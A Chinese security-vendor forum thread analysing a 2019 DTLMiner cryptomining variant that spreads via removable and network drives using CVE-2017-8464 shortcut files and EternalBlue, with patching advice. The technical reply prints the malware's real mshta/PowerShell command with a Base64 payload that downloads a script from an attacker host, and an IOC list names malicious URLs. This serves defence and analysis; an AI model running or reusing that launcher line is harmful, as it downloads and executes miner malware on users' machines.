1   1  /  1  页   跳转

[产品资讯] 瑞星:不打补丁的请警惕DTL最新变种

瑞星:不打补丁的请警惕DTL最新变种

近日, 瑞星安全研究院捕获到挖矿木马病毒“DTLMiner”的最新变种, 该版本增加了新的传播途径并同时利用了“震网三代”CVE-2017-8464和“永恒之蓝”漏洞,相对系统版本较低的企业用户来说,一旦不能及时更新补丁,病毒就会通过移动磁盘和网络磁盘对用户主机进行感染,导致电脑运行缓慢、大量消耗、死机或电脑寿命降低等后果。

瑞星安全专家分析,“DTLMiner”的最新变种通过移动磁盘和网络磁盘传播,病毒每隔5秒便会检测最新接入的可移动磁盘和网络磁盘,并尝试投放感染文件,只要用户打开了被感染的磁盘文件夹, 无需交互病毒便可在用户主机中运行,因此传播性变得更加强大。

从瑞星安全研究院的分析报告来看,“DTLMiner”病毒已持续更新了数次,不断的变种不仅扩大了病毒的攻击面积,还增加了病毒躲避查杀的能力,因此对于个人及企业用户来说,都是危害性极高的。此次最新变种不仅利用了之前的“永恒之蓝”漏洞,还增加了“震网三代”CVE-2017-8464漏洞,因此建议广大用户应及时对电脑安装补丁,以防病毒传播。同时,瑞星ESM已可查杀“DTLMiner”病毒最新变种,广大用可下载安装使用。



在此,为防止用户感染此类病毒,瑞星安全专家提出以下建议:


  • 安装“永恒之蓝”漏洞和“震网三代”CVE-2017-8464漏洞补丁,防止病毒通过漏洞植入;
  • 系统、设备或数据库不要使用弱口令账号密码;
  • 多台设备不要使用相同密码,病毒会抓取本机密码,攻击局域网中的其它机器;
  • 安装安全有效的杀毒软件,保持防护开启。
最后编辑麦青儿 最后编辑于 2019-08-02 15:54:48
分享到:
gototop
 

回复: 瑞星:不打补丁的请警惕DTL最新变种

技术分析

在最新的样本中DTLMiner硬编码保存了两个具有下载恶意病毒功能的DLL文件, 分别是32与64位版本。

图:blue3/blue6.bin


在PowerShell中新增加一段C#代码, 每隔5秒便检测最新接入的可移动磁盘和网络磁盘并尝试投放感染文件。

图:磁盘感染功能


遍历系统中的可移动磁盘、网络磁盘, 对未感染过的磁盘投放病毒文件同时加入过滤列表下次不再检查。

图:监控新磁盘的接入


检查磁盘类型, 针对FAT32或NTFS格式的可移动磁盘或网络磁盘类型进行感染操作。

图:检测文件类型


利用CVE-2017-8464漏洞构造快捷方式文件, 将blue3/blue6.bin与快捷方式文件写入到目标磁盘中。

图:在目标磁盘创建感染文件


释放blue3.bin、blue6.bin恶意文件下载器DLL到目标磁盘。

图:释放下载器DLL


在磁盘中释放的文件如下所示, 其中blue3.bin是32位的DLL, blue6是64位DLL. 由于利用CVE-2017-8464这个漏洞的必须给予绝对路径, 而系统加载U盘是根据剩余可分配的盘符来决定的, DTLMiner提前构造了[D-K] 8个盘符的lnk文件, 从而实现稳定的漏洞利用。

图:在可移动磁盘释放恶意文件


.lnk链接文件利用了CVE-2017-8464漏洞, 无需用户操作, 只要用户浏览了感染文件对应的磁盘就会主动加载DLL文件。

图:CVE-2017-8464漏洞


创建互斥体“MGYnGYPf”防止重复执行, 创建进程rundll32.exe, 通过rundll32.exe执行一段ShellCode。

图:创建Rundll32.exe


ShellCode通过WinExec函数启动mshta执行经过Base64编码的Powshell命令下载DTLMiner执行。

mshta vbscript:createobject("wscript.shell").run("powershell -nop -e JABsAGYAPQAkAGUAbgB2ADoAdABtAHAAKwAnAFwAawBkAGwAcwA5ADIAagBzAGoAcQBzADAALgB1AHMAYgAnADsAaQBmACgAIQAoAFQAZQBzAHQALQBQAGEAdABoACAAJABsAGYAKQApAHsASQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdAAuAHoAZQByADIALgBjAG8AbQAvAHUAcwBiAC4AagBzAHAAJwApADsAbgBlAHcALQBpAHQAZQBtACAAJABsAGYAIAAtAHQAeQBwAGUAIABmAGkAbABlAH0A",0)(window.close)

图:通过WinExec启动mshta


Base64解码后脚本如下,将通过http://t.zer2.com下载usb.jsp脚本。

图:解码后下载脚本


usb.jsp脚本内容同以前的版本相同,在用户主机执行后续挖矿流程。

图:挖矿操作

最后编辑麦青儿 最后编辑于 2019-08-02 15:58:10
gototop
 

回复: 瑞星:不打补丁的请警惕DTL最新变种

IOC
MD5:

9ABFFFAF7A4877C9187C3F8A6E59B065
F1BF55BA24D1A05E80A7CA1D6774AB3D
63F0D100FA83E31ADB4114848FA5E993

URL:

t.zer2.com/usb.jsp
t.zer2.com/v.js
t.awcna.com/v.js
t.amxny.com/v.js
t.zer2.com/v.jsp
down.ackng.com/if.bin
down.ackng.com/m6.bin
down.ackng.com/m3.bin
最后编辑麦青儿 最后编辑于 2019-08-02 16:00:05
gototop
 

回复 5F dongwenqi850604 的帖子

如果能打,还是打上的好
gototop
 

回复: 瑞星:不打补丁的请警惕DTL最新变种



引用:
原帖由 panchengwei 于 2019-8-2 17:27:00 发表
论坛啥时候升级一下,加入微信朋友圈分享功能,可增加论坛内好帖子的影响力 


应该的,但没人手搞这个呢,替代解决方案:
链接发送到QQ上,手机QQ收到链接,打开链接内容,点击右上角3个点,分享到朋友圈
gototop
 
1   1  /  1  页   跳转
页面顶部
Powered by Discuz!NT